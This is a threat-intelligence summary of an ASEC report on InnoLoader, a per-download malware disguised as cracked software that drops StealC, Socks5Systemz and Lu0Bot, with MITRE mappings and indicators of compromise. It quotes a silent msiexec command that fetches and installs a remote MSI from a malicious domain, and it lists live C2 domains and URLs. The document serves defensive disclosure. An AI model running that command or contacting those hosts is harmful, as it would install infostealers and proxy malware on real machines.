ASEC reports a new malware type that is generated per download request, disguising as cracks and commercial tools. The installer UI hides malicious actions that execute when users click through during installation, and the sample is downloaded anew with each request. Hashtags: #InnoLoader #StealC #Socks5Systemz #Lu0Bot #Clicker #Opera #360Security #InnoDownloadPlugin
Keypoints
- For every download request, a new malware sample is created with a different hash but the same malicious capabilities.
- The malware shows an installer UI and triggers malicious behavior when the user clicks through the installation prompts (e.g., clicking “Next”).
- The C2-driven flow retrieves a download URL from the C2 response and repeats the process across multiple C2 URLs until all are processed.
- Investigations uncovered multiple components installed after infection: Infostealer StealC, Socks5Systemz (proxy), a Clicker (browser plugin), and legitimate software like Opera and 360 Security.
- The campaign uses InnoSetup to create the installer, with a plugin (InnoDownloadPlugin) that fetches an additional installer from the network.
- The attack chain includes obfuscated BAT and MSI files; Lu0Bot orchestrates the C2 communications and persistence, enabling installation of additional payloads.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The malware downloads and executes files from the C2. “A file is downloaded and executed from the URL.” The download URL is located in the ‘Location’ entry of the C2 reply header. The files being executed in this process include both normal and malware files.
- [T1059.003] Windows Command Shell – The BAT file execution uses a command: “Execution command: “msiexec /i hxxp://240601155351354.try.kyhd08[.]buzz/f/fvgbm0601001.msi /qn””
- [T1027] Obfuscated/Compressed Files or Information – “The BAT file being downloaded and executed by InnoLoader is obfuscated as shown below.”
- [T1547.001] Boot or Logon Autostart Execution – “for maintenance of persistence, Lu0Bot which installs StealC copies itself under the ProgramData directory and creates a shortcut in the Startup folder.”
- [T1071.001] Application Layer Protocol – The C2 communications utilize HTTP(S) URLs to download payloads and commands (e.g., multiple C2 URLs and “Location” headers).
- [T1090] Proxy – “Socks5Systemz that uses the infected system as a commercial proxy resource”.
- [T1059.003] Windows Command Shell – Additional note on using BAT/ MSI execution flow within the installer.
Indicators of Compromise
- [MD5] 0738205d5a1472662b94561e004d9803 (BAT) – BAT file in the infection chain
- [MD5] b4c9d60f0e2c57c34ec6cb4a564c7ee1 (MSI) – MSI payload masquerading as a Visual C++ installer
- [MD5] 2e85211a7ab36e6d7e2a4a4b5d88b938 (Script, Lu0bot) – Malicious script component
- [MD5] 6b5730e49a37d6ffee273790449ac037 (DLL, StealC) – StealC payload component
- [MD5] 0283c9517cfb46faec1735262bd58654 (TXT, StealC) – Supporting text/payload artifact
- [Domain] InnoLoader C2 Domain – valuescent.website, caretouch[.]hair, monkeyagreement[.]fun, nightauthority[.]xyz
- [Domain] InnoLoader C2 Domain – cattlebusiness[.]icu, laughvein[.]hair, brotherpopcorn[.]website
- [URL] hxxp://240601155506901.try.kyhd08[.]buzz/f/fvgbm0601901.txt
- [URL] hxxp://93.123.39[.]135/129edec4272dc2c8.php
Read more: https://asec.ahnlab.com/en/67502/